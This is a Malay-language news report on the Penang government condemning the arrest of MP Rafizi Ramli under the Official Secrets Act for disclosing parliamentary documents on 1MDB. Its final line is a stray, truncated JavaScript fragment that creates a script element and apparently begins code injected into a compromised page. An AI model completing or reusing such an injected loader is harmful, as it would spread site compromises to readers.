KN kecam tindakan tahan Rafizi bawah OSA

Oleh : ZAINULFAQAR YAACOB

GEORGE TOWN – Kerajaan Pulau Pinang hari ini mengecam tangkapan ke atas Ahli Parlimen Pandan, Rafizi Ramli di luar Parlimen, dengan menggunakan Akta Rahsia Rasmi (OSA) 1972.

Ketua Menteri, Y.A.B Tuan Lim Guan Eng berkata, Rafizi hanya melakukan tanggungjawabnya sebagai Ahli Parlimen dengan mendedahkan dokumen-dokumen salah laku yang membabitkan beberapa individu di bawah pentadbiran Perdana Menteri, Datuk Seri Najib Tun Razak.

“Yang mendedahkan salah laku termasuk rasuah pula diambil tindakan.

“Sepatutnya beliau (Rafizi) dilindungi di bawah Akta Perlindungan Pemberi Maklumat (2010),” katanya yang juga Ahli Parlimen Bagan pada sidang media di sini, baru-baru ini.

Justeru, Guan Eng mempertikai wibawa Menteri di Jabatan Perdana Menteri (JPM), Senator Datuk Paul Low Seng Kuan, yang dipertanggungjawabkan menjaga hal ehwal integriti negara.

“Paul Low kena buat keputusan sama ada letak jawatan sebagai protes terhadap penahanan tersebut atau terus jadi Menteri dan sekali gus buktikan bahawa Whistleblower Act (Akta Perlindungan Pemberi Maklumat) hanya benda hiasan yang indah khabar dari rupa,” ujarnya.

Difahamkan, seseorang yang didapati bersalah di bawah Seksyen 8 (1) dan (2) OSA boleh dipenjara tidak kurang dari satu tahun dan tidak melebihi tujuh tahun. Rafizi ditahan kerana mendedahkan dokumen Jawatankuasa Kira-kira Wang Negara (PAC) mengenai hubungan antara syarikat kontroversi 1Malaysia Development Berhad (1MDB) dan Lembaga Tabung Angkatan Tentera (LTAT).

var d=document;var s=d.createElement(‘script’);